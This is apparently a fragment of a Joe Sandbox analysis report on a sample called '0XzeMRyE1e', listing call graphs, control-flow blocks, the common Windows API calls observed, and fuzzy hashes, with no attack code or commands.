API calls 25709->25711 25712 c996b0 2 API calls 25709->25712 25710 4cec8ea 25710->25666 25711->25710 25712->25710 25714 c996a4 25713->25714 25715 c996db 25714->25715 25729 c99928 25714->25729 25733 c99938 25714->25733 25715->25706 25716 c998d8 GetModuleHandleW 25718 c99905 25716->25718 25717 c996d3 25717->25715 25717->25716 25718->25706 25722 c996c3 25721->25722 25723 c996db 25722->25723 25727 c99928 LoadLibraryExW 25722->25727 25728 c99938 LoadLibraryExW 25722->25728 25723->25706 25724 c996d3 25724->25723 25725 c998d8 GetModuleHandleW 25724->25725 25726 c99905 25725->25726 25726->25706 25727->25724 25728->25724 25730 c9992c 25729->25730 25731 c99971 25730->25731 25737 c992c8 25730->25737 25731->25717 25734 c9993a 25733->25734 25735 c99971 25734->25735 25736 c992c8 LoadLibraryExW 25734->25736 25735->25717 25736->25735 25738 c992cf LoadLibraryExW 25737->25738 25740 c99b91 25738->25740 25740->25731 25742 c9b59a 25741->25742 25743 c9b5df 25742->25743 25749 c995c8 25742->25749 25743->25702 25746 c9b594 25745->25746 25747 c9b5df 25746->25747 25748 c995c8 5 API calls 25746->25748 25747->25702 25748->25747 25750 c995d3 25749->25750 25752 c9c2d8 25750->25752 25753 c9be98 25750->25753 25752->25752 25754 c9bea3 25753->25754 25755 c9587c 5 API calls 25754->25755 25756 c9c347 25755->25756 25757 c9c355 25756->25757 25766 c9c3c0 25756->25766 25772 c9c3b0 25756->25772 25778 c9bea8 25757->25778 25759 c9c36f 25783 c9beb8 25759->25783 25761 c9c376 25787 c9e0dc 25761->25787 25769 c9c3ee 25766->25769 25767 c9c4bf 25768 c9beb8 LoadLibraryExW GetModuleHandleW GetModuleHandleW 25767->25768 25771 c9c52b 25767->25771 25768->25771 25769->25767 25770 c9c4ba KiUserCallbackDispatcher 25769->25770 25769->25771 25770->25767 25774 c9c3ee 25772->25774 25773 c9c4bf 25775 c9beb8 LoadLibraryExW GetModuleHandleW GetModuleHandleW 25773->25775 25777 c9c52b 25773->25777 25774->25773 25776 c9c4ba KiUserCallbackDispatcher 25774->25776 25774->25777 25775->25777 25776->25773 25779 c9beb3 25778->25779 25780 c9c134 LoadLibraryExW GetModuleHandleW GetModuleHandleW 25779->25780 25782 c9d4c1 25779->25782 25781 c9d4bc 25780->25781 25781->25759 25782->25759 25784 c9bec3 25783->25784 25785 c9dad7 25784->25785 25786 c9c258 LoadLibraryExW GetModuleHandleW GetModuleHandleW 25784->25786 25785->25761 25786->25785 25788 c9c380 25787->25788 25789 c9e0f5 25787->25789 25788->25752 25790 c9e12d 25789->25790 25791 c991a1 LoadLibraryExW GetModuleHandleW GetModuleHandleW 25789->25791 25792 c9e520 LoadLibraryExW GetModuleHandleW 25789->25792 25793 c9e530 LoadLibraryExW GetModuleHandleW 25789->25793 25794 c991b0 LoadLibraryExW GetModuleHandleW GetModuleHandleW 25789->25794 25795 4cece50 LoadLibraryExW GetModuleHandleW GetModuleHandleW 25789->25795 25796 4cefa00 LoadLibraryExW GetModuleHandleW GetModuleHandleW 25789->25796 25797 4cefa10 LoadLibraryExW GetModuleHandleW GetModuleHandleW 25789->25797 25798 4cece41 LoadLibraryExW GetModuleHandleW GetModuleHandleW 25789->25798 25791->25790 25792->25790 25793->25790 25794->25790 25795->25790 25796->25790 25797->25790 25798->25790 25799 c9d050 25800 c9d06d 25799->25800 25801 c9beb8 3 API calls 25800->25801 25802 c9d0b1 25800->25802 25801->25802 25834 c9b6b0 25835 c9b6b2 GetCurrentProcess 25834->25835 25837 c9b72a GetCurrentThread 25835->25837 25838 c9b723 25835->25838 25839 c9b760 25837->25839 25840 c9b767 GetCurrentProcess 25837->25840 25838->25837 25839->25840 25843 c9b79d 25840->25843 25841 c9b7c5 GetCurrentThreadId 25842 c9b7f6 25841->25842 25843->25841 25813 4cecc90 25814 4cecca3 25813->25814 25815 c9587c 5 API calls 25813->25815 25817 c97123 25813->25817 25815->25814 25818 c9712f 25817->25818 25820 c973be 25818->25820 25821 4cec7cf 3 API calls 25818->25821 25822 c991a1 3 API calls 25818->25822 25823 c991b0 3 API calls 25818->25823 25824 4cece50 3 API calls 25818->25824 25825 4cefa00 3 API calls 25818->25825 25826 4cefa10 3 API calls 25818->25826 25827 4cec7d0 3 API calls 25818->25827 25828 4cece41 3 API calls 25818->25828 25819 c973fc 25819->25814 25820->25819 25829 c9b2d0 5 API calls 25820->25829 25821->25820 25822->25820 25823->25820 25824->25820 25825->25820 25826->25820 25827->25820 25828->25820 25829->25819 25830 4ceb590 25831 4ceb5b2 25830->25831 25832 c9587c 5 API calls 25830->25832 25833 c97123 5 API calls 25830->25833 25832->25831 25833->25831

                                                                                Control-flow Graph

                                                                                APIs
                                                                                • GetCurrentProcess.KERNEL32 ref: 00C9B710
                                                                                • GetCurrentThread.KERNEL32 ref: 00C9B74D
                                                                                • GetCurrentProcess.KERNEL32 ref: 00C9B78A
                                                                                • GetCurrentThreadId.KERNEL32 ref: 00C9B7E3
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.300686903.0000000000C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C90000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_c90000_0XzeMRyE1e.jbxd
                                                                                Similarity
                                                                                • API ID: Current$ProcessThread
                                                                                • String ID:
                                                                                • API String ID: 2063062207-0
                                                                                • Opcode ID: f033bbd8b4b2737257459aadf85d17df6e999d4382afbe0b62caeaca841d8dde
                                                                                • Instruction ID: 06efbe072ccc662125b4b26622ba168b1bc74fca20199998d63cb88ce351468e
                                                                                • Opcode Fuzzy Hash: f033bbd8b4b2737257459aadf85d17df6e999d4382afbe0b62caeaca841d8dde
                                                                                • Instruction Fuzzy Hash: D16169B0D002899FCB44CFA9D6887EEBBF1EF48304F2585AAE019B7351DB755948CB61
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 27 c9b6a0-c9b6aa 28 c9b6ac 27->28 29 c9b6ae 27->29 28->29 30 c9b6b0-c9b6b1 29->30 31 c9b6b2-c9b721 GetCurrentProcess 29->31 30->31 33 c9b72a-c9b75e GetCurrentThread 31->33 34 c9b723-c9b729 31->34 35 c9b760-c9b766 33->35 36 c9b767-c9b79b GetCurrentProcess 33->36 34->33 35->36 37 c9b79d-c9b7a3 36->37 38 c9b7a4-c9b7bf call c9b860 36->38 37->38 42 c9b7c5-c9b7f4 GetCurrentThreadId 38->42 43 c9b7fd-c9b85f 42->43 44 c9b7f6-c9b7fc 42->44 44->43
                                                                                APIs
                                                                                • GetCurrentProcess.KERNEL32 ref: 00C9B710
                                                                                • GetCurrentThread.KERNEL32 ref: 00C9B74D
                                                                                • GetCurrentProcess.KERNEL32 ref: 00C9B78A
                                                                                • GetCurrentThreadId.KERNEL32 ref: 00C9B7E3
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.300686903.0000000000C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C90000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_c90000_0XzeMRyE1e.jbxd
                                                                                Similarity
                                                                                • API ID: Current$ProcessThread
                                                                                • String ID:
                                                                                • API String ID: 2063062207-0
                                                                                • Opcode ID: 544c2a384a02b0c84e17415edd126e84d9e3f3d40facb8940ada3fc59b99a6c3
                                                                                • Instruction ID: 55ea606471eec4c051633ed98c8e836442089fabe514d0b3712d5e01fcb1bf0a
                                                                                • Opcode Fuzzy Hash: 544c2a384a02b0c84e17415edd126e84d9e3f3d40facb8940ada3fc59b99a6c3
                                                                                • Instruction Fuzzy Hash: F25156B0D003899FDB10CFA9D68879EBBF0AF88314F15855AE419B7350C7755948CB72
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Control-flow Graph

                                                                                APIs
                                                                                • GetCurrentProcess.KERNEL32 ref: 00C9B710
                                                                                • GetCurrentThread.KERNEL32 ref: 00C9B74D
                                                                                • GetCurrentProcess.KERNEL32 ref: 00C9B78A
                                                                                • GetCurrentThreadId.KERNEL32 ref: 00C9B7E3
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.300686903.0000000000C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C90000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_c90000_0XzeMRyE1e.jbxd
                                                                                Similarity
                                                                                • API ID: Current$ProcessThread
                                                                                • String ID:
                                                                                • API String ID: 2063062207-0
                                                                                • Opcode ID: 06258ff33d2cf818cf9852a7a92832196a0cb4f06b1fc4483377d6dad78e9440
                                                                                • Instruction ID: 69e98c9d571025363bef704e761c1fc9f61a5dbdb8d845fd54e52da864af78f0
                                                                                • Opcode Fuzzy Hash: 06258ff33d2cf818cf9852a7a92832196a0cb4f06b1fc4483377d6dad78e9440
                                                                                • Instruction Fuzzy Hash: 875146B0D006899FDB10CFA9D68879EBBF0EF88314F25C559E419B7350C7755948CB61
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 72 c996b0-c996b8 73 c996c3-c996c5 72->73 74 c996be call c98104 72->74 75 c996db-c996df 73->75 76 c996c7 73->76 74->73 77 c996e1-c996eb 75->77 78 c996f3-c99734 75->78 132 c996cd call c99928 76->132 133 c996cd call c99938 76->133 77->78 83 c99741-c9974f 78->83 84 c99736-c9973e 78->84 79 c996d3-c996d5 79->75 81 c99810-c9988a 79->81 120 c9988c-c9988d 81->120 121 c9988e 81->121 85 c99751-c99756 83->85 86 c99773-c99775 83->86 84->83 88 c99758-c9975f call c98110 85->88 89 c99761 85->89 90 c99778-c9977f 86->90 93 c99763-c99771 88->93 89->93 94 c9978c-c99793 90->94 95 c99781-c99789 90->95 93->90 97 c997a0-c997a9 call c98120 94->97 98 c99795-c9979d 94->98 95->94 102 c997ab-c997b3 97->102 103 c997b6-c997bb 97->103 98->97 102->103 105 c997d9-c997dd 103->105 106 c997bd-c997c4 103->106 130 c997e0 call c99c11 105->130 131 c997e0 call c99c40 105->131 106->105 107 c997c6-c997d6 call c9929c call c992ac 106->107 107->105 110 c997e3-c997e6 113 c99809-c9980f 110->113 114 c997e8-c99806 110->114 114->113 120->121 122 c9988f-c99891 121->122 123 c99892-c998d0 121->123 122->123 125 c998d8-c99903 GetModuleHandleW 123->125 126 c998d2-c998d5 123->126 127 c9990c-c99920 125->127 128 c99905-c9990b 125->128 126->125 128->127 130->110 131->110 132->79 133->79
                                                                                APIs
                                                                                • GetModuleHandleW.KERNEL32(00000000), ref: 00C998F6
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.300686903.0000000000C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C90000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_c90000_0XzeMRyE1e.jbxd
                                                                                Similarity
                                                                                • API ID: HandleModule
                                                                                • String ID:
                                                                                • API String ID: 4139908857-0
                                                                                • Opcode ID: 3722e2fdbe0deb523f0094c8b40e53e413831ac22d91e371181373a92a82a9c2
                                                                                • Instruction ID: eead101370c4133c378f5b34be7c5e557da1e743c4695e1f4f3fe8f8582ccc57
                                                                                • Opcode Fuzzy Hash: 3722e2fdbe0deb523f0094c8b40e53e413831ac22d91e371181373a92a82a9c2
                                                                                • Instruction Fuzzy Hash: 46712470A00B058FDB24DF6AC4497AAB7F1FF88304F00892EE55AD7A50DB75E909CB95
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 134 c9fcec-c9fcee 135 c9fcf0 134->135 136 c9fcf2 134->136 135->136 137 c9fcf4 136->137 138 c9fcf6 136->138 137->138 139 c9fcf8-c9fcf9 138->139 140 c9fcfa-c9fd5e 138->140 139->140 141 c9fd69-c9fd70 140->141 142 c9fd60-c9fd66 140->142 143 c9fd7b-c9fdb3 141->143 144 c9fd72-c9fd78 141->144 142->141 145 c9fdbb-c9fe1a CreateWindowExW 143->145 144->143 146 c9fe1c-c9fe22 145->146 147 c9fe23-c9fe5b 145->147 146->147 151 c9fe68 147->151 152 c9fe5d-c9fe60 147->152 153 c9fe69 151->153 152->151 153->153
                                                                                APIs
                                                                                • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 00C9FE0A
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.300686903.0000000000C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C90000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_c90000_0XzeMRyE1e.jbxd
                                                                                Similarity
                                                                                • API ID: CreateWindow
                                                                                • String ID:
                                                                                • API String ID: 716092398-0
                                                                                • Opcode ID: 2a80a68ee2210977a9a50a5ae2f4e0490cc2153394ca9a8bb62171682813ac91
                                                                                • Instruction ID: 834f6de3bb9cae9771207b344417b3963245eb16cfbae9954e4e825e28a7e947
                                                                                • Opcode Fuzzy Hash: 2a80a68ee2210977a9a50a5ae2f4e0490cc2153394ca9a8bb62171682813ac91
                                                                                • Instruction Fuzzy Hash: 2E51CFB1D003499FDF14CF99D884ADEBBB5BF48314F24812EE819AB250D7709946CF91
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 154 c9fcf8-c9fd5e 156 c9fd69-c9fd70 154->156 157 c9fd60-c9fd66 154->157 158 c9fd7b-c9fe1a CreateWindowExW 156->158 159 c9fd72-c9fd78 156->159 157->156 161 c9fe1c-c9fe22 158->161 162 c9fe23-c9fe5b 158->162 159->158 161->162 166 c9fe68 162->166 167 c9fe5d-c9fe60 162->167 168 c9fe69 166->168 167->166 168->168
                                                                                APIs
                                                                                • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 00C9FE0A
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.300686903.0000000000C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C90000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_c90000_0XzeMRyE1e.jbxd
                                                                                Similarity
                                                                                • API ID: CreateWindow
                                                                                • String ID:
                                                                                • API String ID: 716092398-0
                                                                                • Opcode ID: d37c319a80ee0aa9a6b7117bf4409a75c80201dfb3f04fbd1684240a625dbfb3
                                                                                • Instruction ID: 4ddab540fedf68ca6dffd645313ebcb26a1a836b0d9e965300306da95ebc650f
                                                                                • Opcode Fuzzy Hash: d37c319a80ee0aa9a6b7117bf4409a75c80201dfb3f04fbd1684240a625dbfb3
                                                                                • Instruction Fuzzy Hash: 2541BEB1D003499FDF14CF99C884ADEBBB5BF88314F24812AE819AB250D774A985CF90
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 169 c9536c-c95372 170 c95374-c95375 169->170 171 c95376 169->171 170->171 172 c95378-c95379 171->172 173 c9537a-c95439 CreateActCtxA 171->173 172->173 175 c9543b-c95441 173->175 176 c95442-c9549c 173->176 175->176 183 c954ab-c954af 176->183 184 c9549e-c954a1 176->184 185 c954b1-c954bd 183->185 186 c954c0 183->186 184->183 185->186 187 c954c1 186->187 187->187
                                                                                APIs
                                                                                • CreateActCtxA.KERNEL32(?), ref: 00C95429
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.300686903.0000000000C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C90000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_c90000_0XzeMRyE1e.jbxd
                                                                                Similarity
                                                                                • API ID: Create
                                                                                • String ID:
                                                                                • API String ID: 2289755597-0
                                                                                • Opcode ID: 01e4fd16b6993c4ab0c06ad06eea5f4ac66905d8216b68c343a7e6d4500a3f1b
                                                                                • Instruction ID: 452cdc0d00aec30e081be15851b8f17687011a4056a8248913baf41133bd312e
                                                                                • Opcode Fuzzy Hash: 01e4fd16b6993c4ab0c06ad06eea5f4ac66905d8216b68c343a7e6d4500a3f1b
                                                                                • Instruction Fuzzy Hash: 1D4103B0C0466CCEDF25CFA9C884BDEBBB5BF48304F118069D509AB251DB756945CF90
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 189 c93e08-c95439 CreateActCtxA 193 c9543b-c95441 189->193 194 c95442-c9549c 189->194 193->194 201 c954ab-c954af 194->201 202 c9549e-c954a1 194->202 203 c954b1-c954bd 201->203 204 c954c0 201->204 202->201 203->204 205 c954c1 204->205 205->205
                                                                                APIs
                                                                                • CreateActCtxA.KERNEL32(?), ref: 00C95429
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.300686903.0000000000C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C90000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_c90000_0XzeMRyE1e.jbxd
                                                                                Similarity
                                                                                • API ID: Create
                                                                                • String ID:
                                                                                • API String ID: 2289755597-0
                                                                                • Opcode ID: 510b0bb796f00fa9ad148f4933bfde28647090d3dab9db738935ff90a3463556
                                                                                • Instruction ID: 33fe84ff1918c5c87cd70cdccec55f41d27b16f23ef1ff3ea211d1b65c1b7d50
                                                                                • Opcode Fuzzy Hash: 510b0bb796f00fa9ad148f4933bfde28647090d3dab9db738935ff90a3463556
                                                                                • Instruction Fuzzy Hash: D941F3B0C0476CCBDF24CFA9C88879EBBB5BF48304F21816AD509AB251DB756949CF90
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 207 c992e0-c992ea 209 c992ec 207->209 210 c992ee-c992f8 207->210 209->210 212 c992fa 210->212 213 c992cf 210->213 215 c992fc 212->215 216 c992fe-c99318 212->216 214 c99b18-c99b58 213->214 217 c99b5a-c99b5d 214->217 218 c99b60-c99b8f LoadLibraryExW 214->218 215->216 216->214 217->218 219 c99b98-c99bb5 218->219 220 c99b91-c99b97 218->220 220->219
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.300686903.0000000000C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C90000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_c90000_0XzeMRyE1e.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 6dfffc4b6a1f7fdc0fce444ddd905f2c809465b1da276f48ab3bc11b6e949abc
                                                                                • Instruction ID: d8c4ed176f84313297e59e9bdd492becfb6c4c37fa0bcc9efc8e2c1592fb2379
                                                                                • Opcode Fuzzy Hash: 6dfffc4b6a1f7fdc0fce444ddd905f2c809465b1da276f48ab3bc11b6e949abc
                                                                                • Instruction Fuzzy Hash: F521ADB2C093948FDF11CFA9D488ACEBFB0EF59314F16805ED455A7250D3789905CBA1
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 223 c9b8d0-c9b8d2 224 c9b8d4 223->224 225 c9b8d6 223->225 224->225 226 c9b8d8-c9b96c DuplicateHandle 225->226 227 c9b96e-c9b974 226->227 228 c9b975-c9b992 226->228 227->228
                                                                                APIs
                                                                                • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 00C9B95F
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.300686903.0000000000C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C90000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_c90000_0XzeMRyE1e.jbxd
                                                                                Similarity
                                                                                • API ID: DuplicateHandle
                                                                                • String ID:
                                                                                • API String ID: 3793708945-0
                                                                                • Opcode ID: 79ee5c0393119bd9581cf8f4c3a166816f805e9896941e39ea9061c4fb1ceec8
                                                                                • Instruction ID: 45b6179ffd0c4cac2e67308899aa97eba7c5beae75ad42c8d023e190bef7c153
                                                                                • Opcode Fuzzy Hash: 79ee5c0393119bd9581cf8f4c3a166816f805e9896941e39ea9061c4fb1ceec8
                                                                                • Instruction Fuzzy Hash: 5721F4B5900248AFDF10CF99E988AEEBBF8FB48324F14801AE914A3350D374A944CF65
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 231 c9b8d8-c9b96c DuplicateHandle 232 c9b96e-c9b974 231->232 233 c9b975-c9b992 231->233 232->233
                                                                                APIs
                                                                                • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 00C9B95F
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.300686903.0000000000C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C90000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_c90000_0XzeMRyE1e.jbxd
                                                                                Similarity
                                                                                • API ID: DuplicateHandle
                                                                                • String ID:
                                                                                • API String ID: 3793708945-0
                                                                                • Opcode ID: e54a870e6c453979cc48bf8c92540f3829128483458b46e1a82a2dc04d967503
                                                                                • Instruction ID: 4f0f309e04f52377d5b3b0032abe2fbc1471ba61c7678f46529598c1eeaab4ca
                                                                                • Opcode Fuzzy Hash: e54a870e6c453979cc48bf8c92540f3829128483458b46e1a82a2dc04d967503
                                                                                • Instruction Fuzzy Hash: 7921E2B5900248AFDF10CFA9D984ADEBBF8FB48324F15801AE954B3310D374A944DFA1
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 236 c992c8-c99b58 239 c99b5a-c99b5d 236->239 240 c99b60-c99b8f LoadLibraryExW 236->240 239->240 241 c99b98-c99bb5 240->241 242 c99b91-c99b97 240->242 242->241
                                                                                APIs
                                                                                • LoadLibraryExW.KERNEL32(00000000,00000000,?,?,?,?,00000000,?,00C99971,00000800,00000000,00000000), ref: 00C99B82
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.300686903.0000000000C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C90000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_c90000_0XzeMRyE1e.jbxd
                                                                                Similarity
                                                                                • API ID: LibraryLoad
                                                                                • String ID:
                                                                                • API String ID: 1029625771-0
                                                                                • Opcode ID: 905eeb92f3042f8a16f444c49a5f430781e0b5c98eb4adcca470ac5867343a40
                                                                                • Instruction ID: 0139470947c8ae428748789c3520c66b5d258815b86b06fa4da077e2f41378a3
                                                                                • Opcode Fuzzy Hash: 905eeb92f3042f8a16f444c49a5f430781e0b5c98eb4adcca470ac5867343a40
                                                                                • Instruction Fuzzy Hash: 0611D6B59002499FDB20CF9AD448ADEBBF4EB48324F15842ED515A7600C779A945CFA1
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 245 c99b10-c99b58 247 c99b5a-c99b5d 245->247 248 c99b60-c99b8f LoadLibraryExW 245->248 247->248 249 c99b98-c99bb5 248->249 250 c99b91-c99b97 248->250 250->249
                                                                                APIs
                                                                                • LoadLibraryExW.KERNEL32(00000000,00000000,?,?,?,?,00000000,?,00C99971,00000800,00000000,00000000), ref: 00C99B82
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.300686903.0000000000C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C90000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_c90000_0XzeMRyE1e.jbxd
                                                                                Similarity
                                                                                • API ID: LibraryLoad
                                                                                • String ID:
                                                                                • API String ID: 1029625771-0
                                                                                • Opcode ID: 7b890e3c11179879f9bad067c9672af7cf61bb69f190fae96a11c701f6b444ad
                                                                                • Instruction ID: e7aaa3c1236dfd6c15e040dfdf94765096c6e272a073d8c37f62961034d11764
                                                                                • Opcode Fuzzy Hash: 7b890e3c11179879f9bad067c9672af7cf61bb69f190fae96a11c701f6b444ad
                                                                                • Instruction Fuzzy Hash: 2211F2B69002489FDF20CF9AD448ADEBBF5EB98324F14842ED419B7200C379A945CFA5
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 253 c9ff38-c9ff3e 254 c9ff40-c9ffaa SetWindowLongW 253->254 255 c9ffac-c9ffb2 254->255 256 c9ffb3-c9ffc7 254->256 255->256
                                                                                APIs
                                                                                • SetWindowLongW.USER32(?,?,?), ref: 00C9FF9D
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.300686903.0000000000C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C90000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_c90000_0XzeMRyE1e.jbxd
                                                                                Similarity
                                                                                • API ID: LongWindow
                                                                                • String ID:
                                                                                • API String ID: 1378638983-0
                                                                                • Opcode ID: 90aa0afe7b24c3431d94e87cf972c11be4f4a3f0a76aa6f4e423c66a7017e62e
                                                                                • Instruction ID: 2ab78d9a43dee7f6097d6629d58f5d935f69fd20daba5c308554dc1a27f60934
                                                                                • Opcode Fuzzy Hash: 90aa0afe7b24c3431d94e87cf972c11be4f4a3f0a76aa6f4e423c66a7017e62e
                                                                                • Instruction Fuzzy Hash: 361136B18002488FCB10CF99D588BDEFBF8EB88324F14841AE859B3340C375A945CFA1
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 258 c99890-c998d0 260 c998d8-c99903 GetModuleHandleW 258->260 261 c998d2-c998d5 258->261 262 c9990c-c99920 260->262 263 c99905-c9990b 260->263 261->260 263->262
                                                                                APIs
                                                                                • GetModuleHandleW.KERNEL32(00000000), ref: 00C998F6
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.300686903.0000000000C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C90000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_c90000_0XzeMRyE1e.jbxd
                                                                                Similarity
                                                                                • API ID: HandleModule
                                                                                • String ID:
                                                                                • API String ID: 4139908857-0
                                                                                • Opcode ID: 90e268b17a9cfe5b1dcf1538171aab86a50b54600a3edc0a6adb8654f4575548
                                                                                • Instruction ID: 6b61e6de41233e149c9f9dc6870e11c1e6b54e190d771fcc5b710ba9cf3f5e16
                                                                                • Opcode Fuzzy Hash: 90e268b17a9cfe5b1dcf1538171aab86a50b54600a3edc0a6adb8654f4575548
                                                                                • Instruction Fuzzy Hash: 4B11FDB1D002898BDB10CF9AC448ADEBBF4EB89324F15841AD429A7600C375A545CFA1
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                • SetWindowLongW.USER32(?,?,?), ref: 00C9FF9D
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.300686903.0000000000C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C90000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_c90000_0XzeMRyE1e.jbxd
                                                                                Similarity
                                                                                • API ID: LongWindow
                                                                                • String ID:
                                                                                • API String ID: 1378638983-0
                                                                                • Opcode ID: aaf722e0fa4fbdead535076a2f433bb34fbaca2a2f6da9f9b5f949a888d39e2c
                                                                                • Instruction ID: bfe48fb8464ae56634d92571bfa2c43578f06bf17b8a6997d8381701ce260246
                                                                                • Opcode Fuzzy Hash: aaf722e0fa4fbdead535076a2f433bb34fbaca2a2f6da9f9b5f949a888d39e2c
                                                                                • Instruction Fuzzy Hash: A511E2B59002499FDB10CF99D588BDEFBF8EB48324F14841AE959A7740C3B4A944CFA1
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.300511187.0000000000BED000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BED000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_bed000_0XzeMRyE1e.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: c3fbdd1c940f8776738892e839f264eb333d08ee27307431c9ad43b981795e10
                                                                                • Instruction ID: 7db6c368d3dc07e2f079d28093f15ba6fed6e7a5dc848ddcfb37a7ca96cc7d74
                                                                                • Opcode Fuzzy Hash: c3fbdd1c940f8776738892e839f264eb333d08ee27307431c9ad43b981795e10
                                                                                • Instruction Fuzzy Hash: 65213AB1504284DFDB00DF11D9C0B2ABFB5FBA4324F24C6A9E9094B386C376E846D7A1
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.300511187.0000000000BED000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BED000, based on PE: false
